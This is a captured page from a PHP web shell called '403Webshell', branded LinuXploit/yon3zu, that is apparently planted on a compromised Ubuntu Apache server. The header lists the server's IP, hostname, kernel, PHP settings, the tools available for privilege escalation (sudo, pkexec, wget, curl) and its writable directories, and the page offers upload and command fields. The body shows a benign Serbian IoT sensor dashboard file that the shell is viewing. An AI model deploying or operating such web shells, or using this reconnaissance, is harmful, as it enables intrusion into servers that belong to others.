403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/iotdatal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/iotdatal/komande.php
<html>
<head>
    <title>IOT UREĐAJI </title>
</head>

<body style = "text-align:center; font: Verdana; background-color: darkkhaki"></body>

    <h1 style="color: green; font-family: Verdana; font-size: 36px">PRIKAZ PODATAKA SA IoT UREĐAJA</h1>
    <h3 style="color: green; font-family: Verdana; font-size: 24px">IZVOR PODATAKA - SENZORI FIZIČKIH VELIČINA</h3>

<!-- Podesavanje stilova -->
<style>
	table, td, th {
		border: 1px solid blue;
		font-family: Verdana;
	}
	table.center {
		margin-left: auto;
		margin-right: auto;
	}
	th 	{
		vertical-align: "middle";
		text-align: center;
	}
	td	{
		backgound-color: greenyellow;
		text-align: center;
		vertical-align: "middle";
	}
	.button {
  		border: none;
  		border-radius: 6px;
  		color: white;
  		padding: 16px 32px;
  		text-align: center;
  		text-decoration: none;
  		display: inline-block;
  		font-family: Verdana;
  		font-size: 20px;
  		margin: 2px 4px;
  		width: 250px;
  		transition-duration: 0.4s;
  		cursor: pointer;
	}

	.button1 {
  		background-color: gold;
  		color: darkgreen;
  		border: 2px solid #4CAF50;
	}

	.button1:hover {
  		background-color: #4CAF50;
  		color: white;
	}

</style>

<!-- HTML Code 
***************************************************************************************************************************** -->
 <table  class="center">
  	<tr bgcolor="#90ee90" vertical-align: middle>
    		<th><font size="5" face="Verdana" color="green">SENZOR</font></th>
    		<th><font size="5" face="Verdana" color="green">SKUP PODATAKA</font></th>
    		<th><font size="5" face="Verdana" color="green">LOKACIJA IoT UREĐAJA</font></th>
	</tr>
 	<tr bgcolor="#adff2f" vertical-align: "middle">
		<td><form action="http://192.168.1.22/projects/iotdatal/option_1.php" method="get"><button class="button button1"><b>Senzor BME280</b></button></form></td>
		<td><font size="4" color="#0000ff"><b>Prikaz podataka sa senzora BME280</b><br>[<i>Pritisak, Temperatura, Vlažnost, Nadmorska visina</i>]</br></font></td>
    		<td><font size="4" color="#0000ff"><b>RASIN</b></font></td>
  	</tr>
	<tr bgcolor="#adff2f" vertical-align="center">
 		<td><form action="http://192.168.1.22/projects/iotdatal/option_2.php" method="get"><button class="button button1"><b>Senzor prašine</b></button></form></td>
		<td><font size="4" color="#0000ff"><b>Prikaz podataka sa senzora prašine</b></font></td>
    		<td><font size="4" color="#0000ff"><b>RASIN</b></font></td>
  	</tr>
        <tr bgcolor="#adff2f" vertical-align="center">
                <td><form action="http://192.168.1.22/projects/iotdatal/option_3.php" method="get"><button class="button button1"><b>RFID Tag</b></button></form></td>
                <td><font size="4" color="#0000ff"><b>Očitavanje ID RFID tagova</b></font></td>
                <td><font size="4" color="#0000ff"><b>RASIN</b></font></td>
        </tr>
	<tr bgcolor="#adff2f" vertical-align="center">
                <td><form action="http://192.168.1.22/projects/iotdatal/list_meteo.php" method="get"><button class="button button1"><b>Meteo podaci</b></button></form></td>
                <td><font size="4" color="#0000ff"><b>Prikaz podataka sa senzora BME280 i BH1750</b><br>[<i>Pritisak, Temperatura, Vlažnost, Nadmorska visina, Nivo osvetljaja</i>]</br></font></td>
                <td><font size="4" color="#0000ff"><b>RASIN</b></font></td>
        </tr>

</table>
</head>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit